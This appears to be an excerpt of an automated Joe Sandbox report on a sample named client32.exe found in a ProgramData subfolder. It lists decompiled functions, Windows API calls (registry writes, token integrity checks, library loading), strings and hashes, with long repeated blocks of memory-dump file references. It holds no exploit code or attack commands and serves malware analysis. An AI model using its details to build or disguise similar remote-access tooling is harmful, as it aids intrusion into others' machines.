Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CurrentFileModuleNameProcess
String ID: C:\ProgramData\x225qa0\client32.exe
API String ID: 2251294070-3795494224
Opcode ID: 4bd13d76f1b20cdb1905744e884daa295da0da760e6d1ff5c5a6e9fc06adbb17
Instruction ID: b68e03ccdc6c4a6a2c274322f8faab7020ac6906b57b96b3185223f9365e196b
Opcode Fuzzy Hash: 4bd13d76f1b20cdb1905744e884daa295da0da760e6d1ff5c5a6e9fc06adbb17
Instruction Fuzzy Hash: BE11CEB87803539BF704DFA5C9A4B19FBA4AB41B18F20883DE919D7E85EB71E444C780

Function 11110230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 11110239

Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56

_memset.LIBCMT ref: 11110262

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\ctl32\Refcount.cpp, xrefs: 1111024C

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
String ID: ..\ctl32\Refcount.cpp
API String ID: 2803934178-2363596943
Opcode ID: 682feaadb0c8680301ec8f4634659c3c3f42cf446e565166f1417036573033b6
Instruction ID: d1439471c86646bb150eb9b523f3ee6c48551de281bd1a8bb162c90cccd05cf0
Opcode Fuzzy Hash: 682feaadb0c8680301ec8f4634659c3c3f42cf446e565166f1417036573033b6
Instruction Fuzzy Hash: 68E0126AF8062533C511259A6C02FDFF75C8FD2AF9F040031FE0DBA251A596A95181E6

Function 1115CCA0 Relevance: 4.7, APIs: 3, Instructions: 158COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 1115CCC3

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _calloc
String ID:
API String ID: 1679841372-0
Opcode ID: 918923e0a1279dfc537c19a69b58c34981e358f5fb15b3a273ee7d5d1eaccc98
Instruction ID: 23015313aa3c4790eb0b31f5809972b43774ae16244dcdf9e0384501427d1f2b
Opcode Fuzzy Hash: 918923e0a1279dfc537c19a69b58c34981e358f5fb15b3a273ee7d5d1eaccc98
Instruction Fuzzy Hash: 7F519F3560021AAFDB90CF58CC80F9ABBB9FF89744F108559E929DB344D770EA11CB90

Function 11116E30 Relevance: 4.6, APIs: 3, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000), ref: 11116E81
RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 11116EBE
RegCloseKey.ADVAPI32(00000000), ref: 11116EC5

Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32 ref: 11143BF0

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseValue$Query
String ID:
API String ID: 392431914-0
Opcode ID: 0c17dcaf32e79eefaf6146fad22fdca5df33e64ba1c4a8018afc1abead3a4a81
Instruction ID: edf5b6ff414cef76fc351fb673ec4a61117703520949674c054a66456527b656
Opcode Fuzzy Hash: 0c17dcaf32e79eefaf6146fad22fdca5df33e64ba1c4a8018afc1abead3a4a81
Instruction Fuzzy Hash: 2E11DD76201128BBE700CE58DC48FEBB76C9F84B29F048228FE198A189D371A605C7B0

Function 11112140 Relevance: 4.5, APIs: 3, Instructions: 49COMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104,?), ref: 1111216A
__wsplitpath.LIBCMT ref: 11112185

Part of subcall function 11169F04: __splitpath_helper.LIBCMT ref: 11169F46

GetVolumeInformationA.KERNEL32 ref: 111121B9

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
String ID:
API String ID: 1847508633-0
Opcode ID: 71199244ed6d33bf939596fd6a1d73962180ede2ad43d5891037c90b598f2531
Instruction ID: c591a5ba9c17bf4ee1841d59d592da31fd18a085fce33aa04bf57df4da238aa2
Opcode Fuzzy Hash: 71199244ed6d33bf939596fd6a1d73962180ede2ad43d5891037c90b598f2531
Instruction Fuzzy Hash: E4116175A4020CABEB14DF94CD42FE9F778AB48B04F5041D8E6246B1C0E7B02A48CBA5

Function 1109EE00 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE21
OpenProcessToken.ADVAPI32(00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE28

Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
Part of subcall function 1109ED30: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,004DD400,004DD400,004DD400,004DD400,004DD400,004DD400,004DD400,111EFB64,?,00000001,00000001), ref: 1109EDB0
Part of subcall function 1109ED30: EqualSid.ADVAPI32(?,004DD400,?,00000001,00000001), ref: 1109EDC3

CloseHandle.KERNEL32(00000000), ref: 1109EE47

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
String ID:
API String ID: 2256153495-0
Opcode ID: 641b9455226f1aac1b911a8e8f52627aef12e30cb8b5c51eee988bc63af2e0a2
Instruction ID: 92f2080e931b07f8e3ae21524f42d2d018667502f077eef341ad82fca5e9a749
Opcode Fuzzy Hash: 641b9455226f1aac1b911a8e8f52627aef12e30cb8b5c51eee988bc63af2e0a2
Instruction Fuzzy Hash: C8F05E74A01328EFDB08CFE5D99482EB7B8AF08748B40487DE429C3208D632DE00DF50

Function 11069480 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000), ref: 11069542

Strings

??CTL32.DLL, xrefs: 11069503

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: ??CTL32.DLL
API String ID: 1029625771-2984404022
Opcode ID: cf655d8a19676e73a96866a732f5495b69ef782a8a18b6133a21023a43c2cf0f
Instruction ID: 80b6f585093910a847ce346e7da9e0444a9b2d99666d64fa09b423d85774157b
Opcode Fuzzy Hash: cf655d8a19676e73a96866a732f5495b69ef782a8a18b6133a21023a43c2cf0f
Instruction Fuzzy Hash: 9331CF75A046519FE711CF58DC40BAAFBE8FF46724F0482AAE9199B780F771A800CB91

Function 110271A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetDriveTypeA.KERNEL32(?), ref: 110271CD

Strings

?:\, xrefs: 110271C2

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DriveType
String ID: ?:\
API String ID: 338552980-2533537817
Opcode ID: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
Instruction ID: 6b943fba42bebc5ebf3cfcfc9c23cd16540ffeab11205f7f0861f1320acd89e1
Opcode Fuzzy Hash: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
Instruction Fuzzy Hash: F7F0BB70C44BD96AFB22CE5484445867FDA4F172A9F64C4DEDCD886501D375D188CB91

Function 110ED520 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON

Download Yara Rule

APIs

Part of subcall function 110ED4E0: RegCloseKey.ADVAPI32(?), ref: 110ED4ED

RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?), ref: 110ED53C

Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB

Strings

Error %d Opening regkey %s, xrefs: 110ED54A

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseOpenwvsprintf
String ID: Error %d Opening regkey %s
API String ID: 1772833024-3994271378
Opcode ID: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
Instruction ID: 5f226866219d47cdc22a26dd3dbb65f90c8b83d3a621ba21e11ce4a3e0407911
Opcode Fuzzy Hash: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
Instruction Fuzzy Hash: D8E092BB6012183FD221961F9C88EEBBB2CDB916A8F01002AFE1487240D972EC00C7B0

Function 11146FE0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(NSMTRACE), ref: 11146FF9

Part of subcall function 11146270: GetModuleHandleA.KERNEL32(NSMTRACE,11195AD8), ref: 1114628A

Strings

NSMTRACE, xrefs: 11146FF4

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID: NSMTRACE
API String ID: 4133054770-4175627554
Opcode ID: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
Instruction ID: 05ea96992fd141bf150828de6ed923b008e63955592f075fac88204ac5220611
Opcode Fuzzy Hash: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
Instruction Fuzzy Hash: 57D05B76641637CFDF069FB555A0575F7E4EB0AA0D3140075E425C7A06EB61D408C751

Function 110262C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(psapi.dll), ref: 110262C8

Strings

psapi.dll, xrefs: 110262C1

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: psapi.dll
API String ID: 1029625771-80456845
Opcode ID: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
Instruction ID: e72f5ce5ea606eebe772e5127c5e47cd0fc6cc19585cdbbc80c25ff44c20045f
Opcode Fuzzy Hash: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
Instruction Fuzzy Hash: 50E009B1A01B258FC3B0CF3AA544642BAF0BB086103118A7ED0AEC3A04F330A5448F80

Function 1108A2E0 Relevance: 3.1, APIs: 2, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

std::exception::exception.LIBCMT ref: 1108A339
__CxxThrowException@8.LIBCMT ref: 1108A34E

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
String ID:
API String ID: 1338273076-0
Opcode ID: d1bdb1319117574830c17a134cc2d710422d6568c7d670f8424fb0812a79a6e4
Instruction ID: ad670529c7b0aafe0ff7b2bbc6a3dac2c6423bd242fe34faf7ee92730ec6912a
Opcode Fuzzy Hash: d1bdb1319117574830c17a134cc2d710422d6568c7d670f8424fb0812a79a6e4
Instruction Fuzzy Hash: A631BF7AA04204AFC714CF68D84099BFBE9AF84314F14C15EE8598B741D7B5E945CBE0

Function 11075090 Relevance: 3.1, APIs: 2, Instructions: 80COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 110750EF
FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,0000000B,?), ref: 11075159

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FreeLibrary_memset
String ID:
API String ID: 1654520187-0
Opcode ID: 4e56bc08cf6d4b85bc31047bf59587d3794f3c6155dff5afacd053865e97b66c
